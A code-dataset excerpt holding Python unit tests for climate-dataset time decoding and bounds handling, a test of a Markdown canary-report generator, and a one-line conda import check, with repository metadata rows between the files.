dtype="datetime64",
),
dims=["time", "bnds"],
attrs=ds.time_bnds.attrs,
),
}
)
assert result.identical(expected)
expected.time.encoding = {
"source": "None",
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": ds.time.attrs["units"],
"calendar": ds.time.attrs["calendar"],
}
expected.time_bnds.encoding = ds.time_bnds.encoding
assert result.time.encoding == expected.time.encoding
assert result.time_bnds.encoding == expected.time_bnds.encoding
def test_decodes_months_with_a_reference_date_on_a_leap_year(self):
ds = self.ds.copy()
ds.time.attrs["units"] = "months since 2000-02-29"
result = decode_non_cf_time(ds)
expected = xr.Dataset(
{
"time": xr.DataArray(
name="time",
data=np.array(
["2000-03-29", "2000-04-29", "2000-05-29"],
dtype="datetime64",
),
dims=["time"],
attrs=ds.time.attrs,
),
"time_bnds": xr.DataArray(
name="time_bnds",
data=np.array(
[
["2000-02-29", "2000-03-29"],
["2000-03-29", "2000-04-29"],
["2000-04-29", "2000-05-29"],
],
dtype="datetime64",
),
dims=["time", "bnds"],
attrs=ds.time_bnds.attrs,
),
}
)
assert result.identical(expected)
expected.time.encoding = {
"source": "None",
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": ds.time.attrs["units"],
"calendar": ds.time.attrs["calendar"],
}
expected.time_bnds.encoding = ds.time_bnds.encoding
assert result.time.encoding == expected.time.encoding
assert result.time_bnds.encoding == expected.time_bnds.encoding
def test_decodes_years_with_a_reference_date_at_the_middle_of_the_year(self):
ds = self.ds.copy()
ds.time.attrs["units"] = "years since 2000-06-01"
result = decode_non_cf_time(ds)
expected = xr.Dataset(
{
"time": xr.DataArray(
name="time",
data=np.array(
["2001-06-01", "2002-06-01", "2003-06-01"],
dtype="datetime64",
),
dims=["time"],
attrs=ds.time.attrs,
),
"time_bnds": xr.DataArray(
name="time_bnds",
data=np.array(
[
["2000-06-01", "2001-06-01"],
["2001-06-01", "2002-06-01"],
["2002-06-01", "2003-06-01"],
],
dtype="datetime64",
),
dims=["time", "bnds"],
attrs=ds.time_bnds.attrs,
),
}
)
assert result.identical(expected)
expected.time.encoding = {
"source": "None",
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": ds.time.attrs["units"],
"calendar": ds.time.attrs["calendar"],
}
expected.time_bnds.encoding = ds.time_bnds.encoding
assert result.time.encoding == expected.time.encoding
assert result.time_bnds.encoding == expected.time_bnds.encoding
def test_decodes_years_with_a_reference_date_on_a_leap_year(self):
ds = self.ds.copy()
ds.time.attrs["units"] = "years since 2000-02-29"
result = decode_non_cf_time(ds)
expected = xr.Dataset(
{
"time": xr.DataArray(
name="time",
data=[
np.datetime64("2001-02-28"),
np.datetime64("2002-02-28"),
np.datetime64("2003-02-28"),
],
dims=["time"],
),
"time_bnds": xr.DataArray(
name="time_bnds",
data=np.array(
[
["2000-02-29", "2001-02-28"],
["2001-02-28", "2002-02-28"],
["2002-02-28", "2003-02-28"],
],
dtype="datetime64",
),
dims=["time", "bnds"],
attrs=ds.time_bnds.attrs,
),
}
)
expected.time.attrs = ds.time.attrs
assert result.identical(expected)
expected.time.encoding = {
"source": "None",
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": ds.time.attrs["units"],
"calendar": ds.time.attrs["calendar"],
}
expected.time_bnds.encoding = ds.time_bnds.encoding
assert result.time.encoding == expected.time.encoding
assert result.time_bnds.encoding == expected.time_bnds.encoding
class TestPostProcessDataset:
@pytest.fixture(autouse=True)
def setup(self):
self.ds = generate_dataset(cf_compliant=True, has_bounds=True)
def test_keeps_specified_var(self):
ds = generate_dataset(cf_compliant=True, has_bounds=True)
# Create a modified version of the Dataset with a new var
ds_mod = ds.copy()
ds_mod["tas"] = ds_mod.ts.copy()
result = _postprocess_dataset(ds, data_var="ts")
expected = ds.copy()
assert result.identical(expected)
def test_centers_time(self):
ds = generate_dataset(cf_compliant=True, has_bounds=True)
uncentered_time = np.array(
[
"2000-01-31T12:00:00.000000000",
"2000-02-29T12:00:00.000000000",
"2000-03-31T12:00:00.000000000",
"2000-04-30T00:00:00.000000000",
"2000-05-31T12:00:00.000000000",
"2000-06-30T00:00:00.000000000",
"2000-07-31T12:00:00.000000000",
"2000-08-31T12:00:00.000000000",
"2000-09-30T00:00:00.000000000",
"2000-10-16T12:00:00.000000000",
"2000-11-30T00:00:00.000000000",
"2000-12-31T12:00:00.000000000",
"2001-01-31T12:00:00.000000000",
"2001-02-28T00:00:00.000000000",
"2001-12-31T12:00:00.000000000",
],
dtype="datetime64[ns]",
)
ds.time.data[:] = uncentered_time
ds.time.encoding = {
"source": None,
"dtype": np.dtype(np.int64),
"original_shape": ds.time.data.shape,
"units": "days since 2000-01-01",
"calendar": "standard",
"_FillValue": False,
}
# Compare result of the method against the expected.
result = _postprocess_dataset(ds, center_times=True)
expected = ds.copy()
expected_time_data = np.array(
[
"2000-01-16T12:00:00.000000000",
"2000-02-15T12:00:00.000000000",
"2000-03-16T12:00:00.000000000",
"2000-04-16T00:00:00.000000000",
"2000-05-16T12:00:00.000000000",
"2000-06-16T00:00:00.000000000",
"2000-07-16T12:00:00.000000000",
"2000-08-16T12:00:00.000000000",
"2000-09-16T00:00:00.000000000",
"2000-10-16T12:00:00.000000000",
"2000-11-16T00:00:00.000000000",
"2000-12-16T12:00:00.000000000",
"2001-01-16T12:00:00.000000000",
"2001-02-15T00:00:00.000000000",
"2001-12-16T12:00:00.000000000",
],
dtype="datetime64[ns]",
)
expected = expected.assign_coords(
{
"time": xr.DataArray(
name="time",
data=expected_time_data,
coords={"time": expected_time_data},
dims="time",
attrs={
"long_name": "time",
"standard_name": "time",
"axis": "T",
"bounds": "time_bnds",
},
)
}
)
expected.time.encoding = {
"source": None,
"dtype": np.dtype("int64"),
"original_shape": (15,),
"units": "days since 2000-01-01",
"calendar": "standard",
"_FillValue": False,
}
# Update time bounds with centered time coordinates.
time_bounds = ds.time_bnds.copy()
time_bounds["time"] = expected.time
expected["time_bnds"] = time_bounds
# Compare result of the function against the expected.
assert result.identical(expected)
assert result.time.encoding == expected.time.encoding
def test_raises_error_if_dataset_has_no_time_coords_but_center_times_is_true(self):
ds = generate_dataset(cf_compliant=True, has_bounds=False)
ds = ds.drop_dims("time")
with pytest.raises(ValueError):
_postprocess_dataset(ds, center_times=True)
def test_adds_missing_lat_and_lon_bounds(self):
# Create expected dataset without bounds.
ds = generate_dataset(cf_compliant=True, has_bounds=False)
data_vars = list(ds.data_vars.keys())
assert "lat_bnds" not in data_vars
assert "lon_bnds" not in data_vars
result = _postprocess_dataset(ds, add_bounds=True)
result_data_vars = list(result.data_vars.keys())
assert "lat_bnds" in result_data_vars
assert "lon_bnds" in result_data_vars
def test_orients_longitude_bounds_from_180_to_360_and_sorts_with_prime_meridian_cell(
self,
):
# Chunk the dataset to test method also works with Dask.
ds = xr.Dataset(
coords={
"lon": xr.DataArray(
name="lon",
data=np.array([-180, -1, 0, 1, 179]),
dims=["lon"],
attrs={"units": "degrees_east", "axis": "X", "bounds": "lon_bnds"},
)
},
data_vars={
"lon_bnds": xr.DataArray(
name="lon_bnds",
data=np.array(
[
[-180.5, -1.5],
[-1.5, -0.5],
[-0.5, 0.5],
[0.5, 1.5],
[1.5, 179.5],
]
),
dims=["lon", "bnds"],
attrs={"is_generated": "True"},
),
},
).chunk({"lon": 2})
result = _postprocess_dataset(
ds, data_var=None, center_times=False, add_bounds=True, lon_orient=(0, 360)
)
expected = xr.Dataset(
coords={
"lon": xr.DataArray(
name="lon",
data=np.array([0.0, 1.0, 179.0, 180.0, 359.0, 360.0]),
dims=["lon"],
attrs={"units": "degrees_east", "axis": "X", "bounds": "lon_bnds"},
)
},
data_vars={
"lon_bnds": xr.DataArray(
name="lon_bnds",
data=np.array(
[
[0, 0.5],
[0.5, 1.5],
[1.5, 179.5],
[179.5, 358.5],
[358.5, 359.5],
[359.5, 360],
]
),
dims=["lon", "bnds"],
attrs={"is_generated": "True"},
),
},
)
assert result.identical(expected)
def test_raises_error_if_dataset_has_no_longitude_coords_but_lon_orient_is_specified(
self,
):
ds = generate_dataset(cf_compliant=True, has_bounds=False)
ds = ds.drop_dims("lon")
with pytest.raises(ValueError):
_postprocess_dataset(ds, lon_orient=(0, 360))
class TestKeepSingleVar:
@pytest.fixture(autouse=True)
def setup(self):
self.ds = generate_dataset(cf_compliant=True, has_bounds=True)
self.ds_mod = self.ds.copy()
self.ds_mod["tas"] = self.ds_mod.ts.copy()
def tests_raises_error_if_only_bounds_data_variables_exist(self):
ds = self.ds.copy()
ds = ds.drop_vars("ts")
with pytest.raises(ValueError):
_keep_single_var(ds, key="ts")
def test_raises_error_if_specified_data_var_does_not_exist(self):
ds = self.ds_mod.copy()
with pytest.raises(ValueError):
_keep_single_var(ds, key="nonexistent")
def test_raises_error_if_specified_data_var_is_a_bounds_var(self):
ds = self.ds_mod.copy()
with pytest.raises(ValueError):
_keep_single_var(ds, key="lat_bnds")
def test_returns_dataset_with_specified_data_var(self):
result = _keep_single_var(self.ds_mod, key="ts")
expected = self.ds.copy()
assert result.identical(expected)
assert not result.identical(self.ds_mod)
def test_bounds_always_persist(self):
ds = _keep_single_var(self.ds_mod, key="ts")
assert ds.get("lat_bnds") is not None
assert ds.get("lon_bnds") is not None
assert ds.get("time_bnds") is not None
class TestPreProcessNonCFDataset:
@pytest.fixture(autouse=True)
def setup(self):
self.ds = generate_dataset(cf_compliant=False, has_bounds=True)
def test_user_specified_callable_results_in_subsetting_dataset_on_time_slice(self):
def callable(ds):
return ds.isel(time=slice(0, 1))
ds = self.ds.copy()
result = _preprocess_non_cf_dataset(ds, callable)
expected = ds.copy().isel(time=slice(0, 1))
expected["time"] = xr.DataArray(
name="time",
data=np.array(
["2000-01-01"],
dtype="datetime64",
),
dims=["time"],
)
expected["time_bnds"] = xr.DataArray(
name="time_bnds",
data=np.array(
[["1999-12-01", "2000-01-01"]],
dtype="datetime64",
),
dims=["time", "bnds"],
)
expected.time.attrs = ds.time.attrs
expected.time_bnds.attrs = ds.time_bnds.attrs
assert result.identical(expected)
class TestSplitTimeUnitsAttr:
def test_raises_error_if_units_attr_is_none(self):
with pytest.raises(KeyError):
_split_time_units_attr(None) # type: ignore
def test_splits_units_attr_to_unit_and_reference_date(self):
assert _split_time_units_attr("months since 1800") == ("months", "1800")
assert _split_time_units_attr("months since 1800-01-01") == (
"months",
"1800-01-01",
)
assert _split_time_units_attr("months since 1800-01-01 00:00:00") == (
"months",
"1800-01-01 00:00:00",
)
| 37.352391
| 89
| 0.531155
| 4,079
| 35,933
| 4.495219
| 0.071831
| 0.027051
| 0.085079
| 0.085297
| 0.840096
| 0.80541
| 0.774978
| 0.747055
| 0.721204
| 0.698517
| 0
| 0.152846
| 0.345254
| 35,933
| 961
| 90
| 37.391259
| 0.626514
| 0.059806
| 0
| 0.613551
| 1
| 0
| 0.188904
| 0.103136
| 0
| 0
| 0
| 0
| 0.065245
| 1
| 0.055207
| false
| 0
| 0.010038
| 0.001255
| 0.076537
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4cbfd7715f9b83ddc84288f6b0b486b797a48ebd
| 17,471
|
py
|
Python
|
test/testMarkdownGenerator.py
|
open-cluster-management/canary-reporting
|
d97d49fb83e8e8d5e56b937261928285303e475e
|
[
"Apache-2.0"
] | null | null | null |
test/testMarkdownGenerator.py
|
open-cluster-management/canary-reporting
|
d97d49fb83e8e8d5e56b937261928285303e475e
|
[
"Apache-2.0"
] | 35
|
2021-03-24T14:57:42.000Z
|
2021-09-23T18:37:58.000Z
|
test/testMarkdownGenerator.py
|
open-cluster-management/canary-reporting
|
d97d49fb83e8e8d5e56b937261928285303e475e
|
[
"Apache-2.0"
] | 1
|
2021-08-02T14:26:55.000Z
|
2021-08-02T14:26:55.000Z
|
import unittest, os, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../..')))
from generators import MarkdownGenerator
class TestMarkdownGenerator(unittest.TestCase):
results_folder = f"{os.path.dirname(os.path.abspath(__file__))}/test_results_dir"
ignorelist = [
{
"name": "Search: Viewer is NOT able to edit configmaps",
"squad": "search",
"owner": "@anonymous-user-that-I-wont-name"
},
{
"name": "Search: Load page",
"squad": "search",
"owner": "@anonymous-user-that-I-wont-name"
}
]
def test_markdown_report_full(self):
_md_generator = MarkdownGenerator.MarkdownGenerator(
[TestMarkdownGenerator.results_folder],
snapshot="TEST_SNAPSHOT",
branch="TEST_BRANCH",
stage="TEST_STAGE",
hub_version="TEST_HUB_VERSION",
hub_platform="TEST_HUB_PLATFORM",
import_cluster_details=[
{
"clustername": "cluster1",
"version": "4.7.0",
"platform": "aws"
},
{
"clustername": "cluster2",
"version": "4.7.1",
"platform": "gcp"
}
],
job_url="TEST_JOB_URL",
build_id="TEST_BUILD_ID",
sd_url="TEST_SD_URL",
issue_url="TEST_ISSUE_URL",
ignorelist=[]
)
_md_report = _md_generator.generate_markdown_report()
self.assertEqual(_md_report, """# :red_circle:TEST_SNAPSHOT Failed on branch Test_stage
## Job URL: TEST_JOB_URL
## Artifacts & Details
[**Snapshot Diff**](TEST_SD_URL)
[**Opened Issue**](TEST_ISSUE_URL)
**Hub Cluster Platform:** TEST_HUB_PLATFORM **Hub Cluster Version:** TEST_HUB_VERSION
**Import Cluster(s):**
* **Import Cluster Platform:** aws **Import Cluster Version:** 4.7.0
* **Import Cluster Platform:** gcp **Import Cluster Version:** 4.7.1
## Quality Gate
:warning: **Percentage Executed:** 92.31% (100% Quality Gate)
:red_circle: **Percentage Passing:** 75.0% (100% Quality Gate)
## Summary
**:white_check_mark: 9 Tests Passed**
**:x: 3 Tests Failed**
**:large_orange_diamond: 0 Failures Ignored**
**:large_blue_circle: 1 Test Case Skipped**
## Test Case Summary
|Results|Testsuite|Test|
|---|---|---|
| :white_check_mark: | Cluster | Cluster can be created on AWS |
| :white_check_mark: | Cluster | Cluster comes to the Ready status - "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be applied on "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be generated for "ds8-aws-444" |
| :large_blue_circle: | adminSearch.test | Edit secret as Admin user |
| :white_check_mark: | Overview | Overview page should load |
| :white_check_mark: | Provider connections | Provider connections page should load |
| :x: | Provider connections | Provider connections should be able to be created |
| :white_check_mark: | Provider connections | Provider connections should be abled to be edited |
| :white_check_mark: | adminSearch.test | Search: Load page |
| :white_check_mark: | viewerSearch.test | Search: Load page |
| :x: | adminSearch.test | Search: Search for secret |
| :x: | viewerSearch.test | Search: Viewer is NOT able to edit configmaps |
## Failing Tests
### :x: Provider connections -> Provider connections should be able to be created
```
CypressError: Timed out retrying: `cy.click()` failed because this element is `disabled`:
`<button tabindex="0" class="bx--btn bx--btn--primary" disabled="" type="button">Go to p...</button>`
Fix this problem, or use `{force: true}` to disable error checking.
https://on.cypress.io/element-cannot-be-interacted-with
at cypressErr (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146621:16)
at cypressErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146630:10)
at Object.throwErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146593:11)
at Object.ensureNotDisabled (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:137570:24)
at runAllChecks (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127486:14)
at retryActionability (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127542:16)
at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
at Function.Promise.attempt.Promise.try (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:6339:29)
at tryFn (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140680:21)
at whenStable (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140715:12)
at https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140259:16
at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
at Promise._settlePromiseFromHandler (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7000:31)
at Promise._settlePromise (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7057:18)
at Promise._settlePromise0 (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7102:10)
at Promise._settlePromises (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7182:18)
```
### :x: adminSearch.test -> Search: Search for secret
```
at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
at Object.Search: Search for secret (/tests/e2e/adminSearch.test.js:34:16)
```
### :x: viewerSearch.test -> Search: Viewer is NOT able to edit configmaps
```
at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
at Object.Search: Viewer is NOT able to edit configmaps (/tests/e2e/viewerSearch.test.js:41:16)
```
""")
def test_markdown_report_ignorelist(self):
_md_generator = MarkdownGenerator.MarkdownGenerator(
[TestMarkdownGenerator.results_folder],
snapshot="TEST_SNAPSHOT",
branch="TEST_BRANCH",
stage="TEST_STAGE",
hub_version="TEST_HUB_VERSION",
hub_platform="TEST_HUB_PLATFORM",
import_cluster_details=[
{
"clustername": "cluster1",
"version": "4.7.0",
"platform": "aws"
},
{
"clustername": "cluster2",
"version": "4.7.1",
"platform": "gcp"
}
],
job_url="TEST_JOB_URL",
build_id="TEST_BUILD_ID",
sd_url="TEST_SD_URL",
issue_url="TEST_ISSUE_URL",
ignorelist=TestMarkdownGenerator.ignorelist
)
_md_report = _md_generator.generate_markdown_report()
self.assertEqual(_md_report, """# :red_circle:TEST_SNAPSHOT Failed on branch Test_stage
## Job URL: TEST_JOB_URL
## Artifacts & Details
[**Snapshot Diff**](TEST_SD_URL)
[**Opened Issue**](TEST_ISSUE_URL)
**Hub Cluster Platform:** TEST_HUB_PLATFORM **Hub Cluster Version:** TEST_HUB_VERSION
**Import Cluster(s):**
* **Import Cluster Platform:** aws **Import Cluster Version:** 4.7.0
* **Import Cluster Platform:** gcp **Import Cluster Version:** 4.7.1
## Quality Gate
:warning: **Percentage Executed:** 92.31% (100% Quality Gate)
:red_circle: **Percentage Passing:** 75.0% (100% Quality Gate)
## Summary
**:white_check_mark: 9 Tests Passed**
**:x: 2 Tests Failed**
**:large_orange_diamond: 1 Failure Ignored**
**:large_blue_circle: 1 Test Case Skipped**
## Test Case Summary
|Results|Testsuite|Test|
|---|---|---|
| :white_check_mark: | Cluster | Cluster can be created on AWS |
| :white_check_mark: | Cluster | Cluster comes to the Ready status - "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be applied on "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be generated for "ds8-aws-444" |
| :large_blue_circle: | adminSearch.test | Edit secret as Admin user |
| :white_check_mark: | Overview | Overview page should load |
| :white_check_mark: | Provider connections | Provider connections page should load |
| :x: | Provider connections | Provider connections should be able to be created |
| :white_check_mark: | Provider connections | Provider connections should be abled to be edited |
| :white_check_mark: | adminSearch.test | Search: Load page |
| :white_check_mark: | viewerSearch.test | Search: Load page |
| :x: | adminSearch.test | Search: Search for secret |
| :large_orange_diamond: | viewerSearch.test | Search: Viewer is NOT able to edit configmaps |
## Failing Tests
### :x: Provider connections -> Provider connections should be able to be created
```
CypressError: Timed out retrying: `cy.click()` failed because this element is `disabled`:
`<button tabindex="0" class="bx--btn bx--btn--primary" disabled="" type="button">Go to p...</button>`
Fix this problem, or use `{force: true}` to disable error checking.
https://on.cypress.io/element-cannot-be-interacted-with
at cypressErr (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146621:16)
at cypressErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146630:10)
at Object.throwErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146593:11)
at Object.ensureNotDisabled (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:137570:24)
at runAllChecks (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127486:14)
at retryActionability (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127542:16)
at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
at Function.Promise.attempt.Promise.try (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:6339:29)
at tryFn (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140680:21)
at whenStable (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140715:12)
at https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140259:16
at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
at Promise._settlePromiseFromHandler (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7000:31)
at Promise._settlePromise (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7057:18)
at Promise._settlePromise0 (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7102:10)
at Promise._settlePromises (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7182:18)
```
### :x: adminSearch.test -> Search: Search for secret
```
at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
at Object.Search: Search for secret (/tests/e2e/adminSearch.test.js:34:16)
```
### :large_orange_diamond: viewerSearch.test -> Search: Viewer is NOT able to edit configmaps
```
at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
at Object.Search: Viewer is NOT able to edit configmaps (/tests/e2e/viewerSearch.test.js:41:16)
```
""")
def test_markdown_report_min(self):
_md_generator = MarkdownGenerator.MarkdownGenerator([TestMarkdownGenerator.results_folder])
_md_report = _md_generator.generate_markdown_report()
self.assertEqual(_md_report, """# :red_circle: Failed
## Artifacts & Details
## Quality Gate
:warning: **Percentage Executed:** 92.31% (100% Quality Gate)
:red_circle: **Percentage Passing:** 75.0% (100% Quality Gate)
## Summary
**:white_check_mark: 9 Tests Passed**
**:x: 3 Tests Failed**
**:large_orange_diamond: 0 Failures Ignored**
**:large_blue_circle: 1 Test Case Skipped**
## Test Case Summary
|Results|Testsuite|Test|
|---|---|---|
| :white_check_mark: | Cluster | Cluster can be created on AWS |
| :white_check_mark: | Cluster | Cluster comes to the Ready status - "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be applied on "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be generated for "ds8-aws-444" |
| :large_blue_circle: | adminSearch.test | Edit secret as Admin user |
| :white_check_mark: | Overview | Overview page should load |
| :white_check_mark: | Provider connections | Provider connections page should load |
| :x: | Provider connections | Provider connections should be able to be created |
| :white_check_mark: | Provider connections | Provider connections should be abled to be edited |
| :white_check_mark: | adminSearch.test | Search: Load page |
| :white_check_mark: | viewerSearch.test | Search: Load page |
| :x: | adminSearch.test | Search: Search for secret |
| :x: | viewerSearch.test | Search: Viewer is NOT able to edit configmaps |
## Failing Tests
### :x: Provider connections -> Provider connections should be able to be created
```
CypressError: Timed out retrying: `cy.click()` failed because this element is `disabled`:
`<button tabindex="0" class="bx--btn bx--btn--primary" disabled="" type="button">Go to p...</button>`
Fix this problem, or use `{force: true}` to disable error checking.
https://on.cypress.io/element-cannot-be-interacted-with
at cypressErr (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146621:16)
at cypressErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146630:10)
at Object.throwErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146593:11)
at Object.ensureNotDisabled (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:137570:24)
at runAllChecks (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127486:14)
at retryActionability (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127542:16)
at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
at Function.Promise.attempt.Promise.try (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:6339:29)
at tryFn (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140680:21)
at whenStable (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140715:12)
at https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140259:16
at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
at Promise._settlePromiseFromHandler (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7000:31)
at Promise._settlePromise (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7057:18)
at Promise._settlePromise0 (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7102:10)
at Promise._settlePromises (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7182:18)
```
### :x: adminSearch.test -> Search: Search for secret
```
at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
at Object.Search: Search for secret (/tests/e2e/adminSearch.test.js:34:16)
```
### :x: viewerSearch.test -> Search: Viewer is NOT able to edit configmaps
```
at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
at Object.Search: Viewer is NOT able to edit configmaps (/tests/e2e/viewerSearch.test.js:41:16)
```
""")
if __name__ == '__main__':
unittest.main()
| 49.633523
| 157
| 0.718219
| 2,331
| 17,471
| 5.222222
| 0.099099
| 0.102522
| 0.086749
| 0.102522
| 0.970919
| 0.968537
| 0.968537
| 0.968537
| 0.958679
| 0.951779
| 0
| 0.047037
| 0.143323
| 17,471
| 352
| 158
| 49.633523
| 0.766286
| 0
| 0
| 0.868132
| 0
| 0.241758
| 0.864812
| 0.093922
| 0
| 0
| 0
| 0
| 0.010989
| 1
| 0.010989
| false
| 0.021978
| 0.058608
| 0
| 0.080586
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4ceae7dfc09d929e5073ff9de80b4666670c99ab
| 53
|
py
|
Python
|
PythonFiles/Miniconda2/pkgs/wincertstore-0.2-py27hf04cefb_0/info/test/run_test.py
|
manos-mark/WebCamera-Head-and-Gaze-tracking
|
5001196f2e9ef31a653ee66efed979b3d10452e8
|
[
"MIT"
] | null | null | null |
PythonFiles/Miniconda2/pkgs/wincertstore-0.2-py27hf04cefb_0/info/test/run_test.py
|
manos-mark/WebCamera-Head-and-Gaze-tracking
|
5001196f2e9ef31a653ee66efed979b3d10452e8
|
[
"MIT"
] | null | null | null |
PythonFiles/Miniconda2/pkgs/wincertstore-0.2-py27hf04cefb_0/info/test/run_test.py
|
manos-mark/WebCamera-Head-and-Gaze-tracking
|
5001196f2e9ef31a653ee66efed979b3d10452e8
|
[
"MIT"
] | null | null | null |
print("import: 'wincertstore'")
import wincertstore
| 13.25
| 31
| 0.773585
| 5
| 53
| 8.2
| 0.6
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09434
| 53
| 3
| 32
| 17.666667
| 0.854167
| 0
| 0
| 0
| 0
| 0
| 0.423077
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
